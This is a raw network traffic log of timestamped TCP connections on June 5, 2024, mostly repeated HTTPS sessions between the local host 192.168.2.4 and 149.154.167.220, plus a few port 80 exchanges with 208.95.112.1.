Jun 5, 2024 03:57:17.509264946 CEST	49789	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:17.509356022 CEST	443	49789	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:18.337071896 CEST	49790	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:18.337157965 CEST	443	49790	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:18.337272882 CEST	49790	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:18.337704897 CEST	49790	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:18.337799072 CEST	443	49790	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:18.372883081 CEST	443	49789	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:18.374227047 CEST	49789	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:18.374315977 CEST	443	49789	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:18.622143030 CEST	443	49789	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:18.622303963 CEST	443	49789	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:18.622505903 CEST	49789	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:18.622659922 CEST	49789	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:18.972924948 CEST	80	49750	208.95.112.1	192.168.2.4
Jun 5, 2024 03:57:18.973258972 CEST	49750	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:57:19.191809893 CEST	443	49790	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:19.194401026 CEST	49790	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:19.194492102 CEST	443	49790	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:19.443176031 CEST	443	49790	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:19.443253994 CEST	443	49790	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:19.443392992 CEST	49790	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:19.443835020 CEST	49790	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:19.634007931 CEST	49791	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:19.634046078 CEST	443	49791	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:19.634128094 CEST	49791	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:19.635023117 CEST	49791	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:19.635036945 CEST	443	49791	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:20.446108103 CEST	49792	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:20.446154118 CEST	443	49792	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:20.446240902 CEST	49792	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:20.446518898 CEST	49792	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:20.446542025 CEST	443	49792	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:20.472700119 CEST	443	49791	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:20.473761082 CEST	49791	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:20.473822117 CEST	443	49791	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:20.715899944 CEST	443	49791	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:20.716087103 CEST	443	49791	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:20.716150999 CEST	49791	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:20.720956087 CEST	49791	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:21.291228056 CEST	443	49792	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:21.292537928 CEST	49792	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:21.292625904 CEST	443	49792	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:21.540828943 CEST	443	49792	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:21.540894985 CEST	443	49792	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:21.540972948 CEST	49792	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:21.541410923 CEST	49792	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:21.769417048 CEST	49793	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:21.769506931 CEST	443	49793	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:21.769613028 CEST	49793	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:21.769928932 CEST	49793	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:21.769959927 CEST	443	49793	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:22.555602074 CEST	49794	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:22.555649042 CEST	443	49794	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:22.555731058 CEST	49794	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:22.555991888 CEST	49794	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:22.556015015 CEST	443	49794	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:22.604394913 CEST	443	49793	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:22.605434895 CEST	49793	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:22.605468035 CEST	443	49793	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:22.848769903 CEST	443	49793	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:22.848931074 CEST	443	49793	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:22.849169970 CEST	49793	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:22.849421024 CEST	49793	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:23.382541895 CEST	443	49794	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:23.384531021 CEST	49794	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:23.384577990 CEST	443	49794	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:23.627511978 CEST	443	49794	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:23.627569914 CEST	443	49794	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:23.627651930 CEST	49794	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:23.628171921 CEST	49794	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:23.852688074 CEST	49795	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:23.852776051 CEST	443	49795	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:23.852868080 CEST	49795	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:23.853214979 CEST	49795	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:23.853302002 CEST	443	49795	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:24.634660959 CEST	49796	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:24.634747028 CEST	443	49796	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:24.634850025 CEST	49796	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:24.635396957 CEST	49796	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:24.635481119 CEST	443	49796	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:24.692553997 CEST	443	49795	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:24.694021940 CEST	49795	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:24.694114923 CEST	443	49795	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:24.941884995 CEST	443	49795	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:24.941970110 CEST	443	49795	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:24.942341089 CEST	49795	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:24.942723036 CEST	49795	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:25.481851101 CEST	443	49796	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:25.482969999 CEST	49796	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:25.483004093 CEST	443	49796	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:25.732239008 CEST	443	49796	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:25.732290983 CEST	443	49796	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:25.732362032 CEST	49796	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:25.732831955 CEST	49796	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:25.946115971 CEST	49797	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:25.946199894 CEST	443	49797	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:25.946305037 CEST	49797	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:25.946656942 CEST	49797	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:25.946758032 CEST	443	49797	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:26.743119955 CEST	49798	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:26.743206024 CEST	443	49798	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:26.743297100 CEST	49798	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:26.743813038 CEST	49798	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:26.743900061 CEST	443	49798	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:26.793236017 CEST	443	49797	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:26.794656038 CEST	49797	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:26.794744015 CEST	443	49797	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:27.042890072 CEST	443	49797	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:27.043071985 CEST	443	49797	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:27.043148994 CEST	49797	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:27.043464899 CEST	49797	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:27.588088036 CEST	443	49798	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:27.593782902 CEST	49798	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:27.593869925 CEST	443	49798	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:27.839651108 CEST	443	49798	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:27.839701891 CEST	443	49798	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:27.839807987 CEST	49798	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:27.840137005 CEST	49798	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:28.056878090 CEST	49799	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:28.056963921 CEST	443	49799	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:28.057090044 CEST	49799	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:28.057425022 CEST	49799	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:28.057507038 CEST	443	49799	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:28.852564096 CEST	49800	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:28.852648973 CEST	443	49800	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:28.853013039 CEST	49800	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:28.853126049 CEST	49800	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:28.853157043 CEST	443	49800	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:28.889136076 CEST	443	49799	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:28.890291929 CEST	49799	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:28.890384912 CEST	443	49799	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:29.134720087 CEST	443	49799	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:29.134905100 CEST	443	49799	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:29.135237932 CEST	49799	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:29.135237932 CEST	49799	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:29.894865036 CEST	443	49800	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:29.896094084 CEST	49800	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:29.896181107 CEST	443	49800	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:30.143723011 CEST	443	49800	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:30.143812895 CEST	443	49800	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:30.143923998 CEST	49800	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:30.144292116 CEST	49800	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:30.149450064 CEST	49801	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:30.149533987 CEST	443	49801	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:30.149806976 CEST	49801	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:30.149919987 CEST	49801	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:30.149950027 CEST	443	49801	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:30.991275072 CEST	443	49801	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:30.992516041 CEST	49801	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:30.992604971 CEST	443	49801	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:31.149574041 CEST	49802	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:31.149656057 CEST	443	49802	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:31.149950981 CEST	49802	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:31.150063992 CEST	49802	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:31.150094986 CEST	443	49802	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:31.238588095 CEST	443	49801	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:31.238765955 CEST	443	49801	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:31.238845110 CEST	49801	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:31.239224911 CEST	49801	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:31.987227917 CEST	443	49802	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:31.988125086 CEST	49802	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:31.988209009 CEST	443	49802	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:32.233663082 CEST	443	49802	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:32.233753920 CEST	443	49802	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:32.233977079 CEST	49802	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:32.234291077 CEST	49802	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:32.243315935 CEST	49803	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:32.243407011 CEST	443	49803	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:32.243733883 CEST	49803	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:32.243733883 CEST	49803	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:32.243870974 CEST	443	49803	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:33.094693899 CEST	443	49803	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:33.095854998 CEST	49803	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:33.095976114 CEST	443	49803	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:33.243135929 CEST	49804	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:33.243222952 CEST	443	49804	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:33.243323088 CEST	49804	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:33.243694067 CEST	49804	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:33.243777990 CEST	443	49804	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:33.344434977 CEST	443	49803	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:33.344635010 CEST	443	49803	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:33.344862938 CEST	49803	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:33.344974041 CEST	49803	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:33.797818899 CEST	80	49766	208.95.112.1	192.168.2.4
Jun 5, 2024 03:57:33.798046112 CEST	49766	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:57:34.088434935 CEST	443	49804	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:34.089636087 CEST	49804	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:34.089725971 CEST	443	49804	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:34.338670015 CEST	443	49804	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:34.338731050 CEST	443	49804	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:34.338891983 CEST	49804	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:34.339180946 CEST	49804	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:34.352988958 CEST	49805	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:34.353072882 CEST	443	49805	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:34.353163958 CEST	49805	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:34.353486061 CEST	49805	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:34.353569031 CEST	443	49805	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:35.192472935 CEST	443	49805	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:35.193547964 CEST	49805	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:35.193643093 CEST	443	49805	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:35.352621078 CEST	49806	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:35.352706909 CEST	443	49806	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:35.352987051 CEST	49806	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:35.353104115 CEST	49806	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:35.353135109 CEST	443	49806	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:35.439791918 CEST	443	49805	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:35.439953089 CEST	443	49805	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:35.440046072 CEST	49805	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:35.440232992 CEST	49805	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:36.196062088 CEST	443	49806	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:36.197809935 CEST	49806	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:36.197901964 CEST	443	49806	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:36.445388079 CEST	443	49806	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:36.445472956 CEST	443	49806	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:36.445585966 CEST	49806	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:36.446013927 CEST	49806	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:36.446440935 CEST	49807	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:36.446527004 CEST	443	49807	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:36.446638107 CEST	49807	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:36.446930885 CEST	49807	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:36.447015047 CEST	443	49807	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:37.294635057 CEST	443	49807	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:37.295897007 CEST	49807	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:37.295985937 CEST	443	49807	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:37.461961031 CEST	49808	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:37.462044001 CEST	443	49808	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:37.462165117 CEST	49808	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:37.462479115 CEST	49808	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:37.462553978 CEST	443	49808	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:37.544410944 CEST	443	49807	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:37.544609070 CEST	443	49807	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:37.544812918 CEST	49807	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:37.544917107 CEST	49807	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:38.306483984 CEST	443	49808	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:38.307672024 CEST	49808	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:38.307760000 CEST	443	49808	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:38.555546045 CEST	49809	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:38.555586100 CEST	443	49809	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:38.555659056 CEST	49809	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:38.555856943 CEST	49809	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:38.555871010 CEST	443	49809	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:38.558808088 CEST	443	49808	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:38.558866024 CEST	443	49808	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:38.558976889 CEST	49808	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:38.559111118 CEST	49808	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:39.389671087 CEST	443	49809	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:39.430391073 CEST	49809	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:39.583688021 CEST	49809	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:39.583705902 CEST	443	49809	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:39.656749010 CEST	49810	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:39.656788111 CEST	443	49810	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:39.656847000 CEST	49810	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:39.657134056 CEST	49810	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:39.657145023 CEST	443	49810	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:39.824955940 CEST	443	49809	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:39.825115919 CEST	443	49809	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:39.825175047 CEST	49809	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:39.825409889 CEST	49809	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:40.503236055 CEST	443	49810	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:40.504128933 CEST	49810	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:40.504148960 CEST	443	49810	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:40.753689051 CEST	443	49810	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:40.753743887 CEST	443	49810	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:40.753901958 CEST	49810	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:40.754127026 CEST	49810	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:40.838938951 CEST	49811	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:40.839024067 CEST	443	49811	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:40.839329004 CEST	49811	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:40.839329004 CEST	49811	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:40.839466095 CEST	443	49811	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:41.680054903 CEST	443	49811	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:41.689047098 CEST	49811	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:41.689130068 CEST	443	49811	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:41.795591116 CEST	49812	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:41.795636892 CEST	443	49812	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:41.795732021 CEST	49812	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:41.795950890 CEST	49812	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:41.795958996 CEST	443	49812	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:41.931857109 CEST	443	49811	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:41.931998968 CEST	443	49811	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:41.932204962 CEST	49811	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:41.932288885 CEST	49811	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:42.631899118 CEST	443	49812	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:42.632898092 CEST	49812	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:42.632914066 CEST	443	49812	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:42.879930019 CEST	443	49812	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:42.879978895 CEST	443	49812	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:42.880131006 CEST	49812	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:42.880352974 CEST	49812	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:42.970036983 CEST	49813	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:42.970123053 CEST	443	49813	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:42.970221996 CEST	49813	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:42.970547915 CEST	49813	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:42.970621109 CEST	443	49813	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:43.817003965 CEST	443	49813	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:43.820410013 CEST	49813	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:43.820444107 CEST	443	49813	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:43.883702040 CEST	49814	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:43.883733034 CEST	443	49814	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:43.883825064 CEST	49814	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:43.884068966 CEST	49814	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:43.884088993 CEST	443	49814	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:44.062079906 CEST	443	49813	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:44.062134981 CEST	443	49813	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:44.062258959 CEST	49813	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:44.062602997 CEST	49813	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:44.713816881 CEST	443	49814	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:44.714767933 CEST	49814	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:44.714812994 CEST	443	49814	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:44.961263895 CEST	443	49814	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:44.961309910 CEST	443	49814	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:44.961360931 CEST	49814	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:44.961749077 CEST	49814	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:45.074151039 CEST	49815	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:45.074182034 CEST	443	49815	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:45.074239016 CEST	49815	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:45.074460030 CEST	49815	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:45.074470997 CEST	443	49815	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:45.924766064 CEST	443	49815	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:45.925739050 CEST	49815	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:45.925755978 CEST	443	49815	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:45.980901957 CEST	49816	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:45.980921984 CEST	443	49816	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:45.981139898 CEST	49816	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:45.981353998 CEST	49816	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:45.981359959 CEST	443	49816	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:46.174664974 CEST	443	49815	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:46.174742937 CEST	443	49815	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:46.174793959 CEST	49815	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:46.175229073 CEST	49815	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:46.818135023 CEST	443	49816	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:46.819674969 CEST	49816	443	192.168.2.4	149.154.167.220
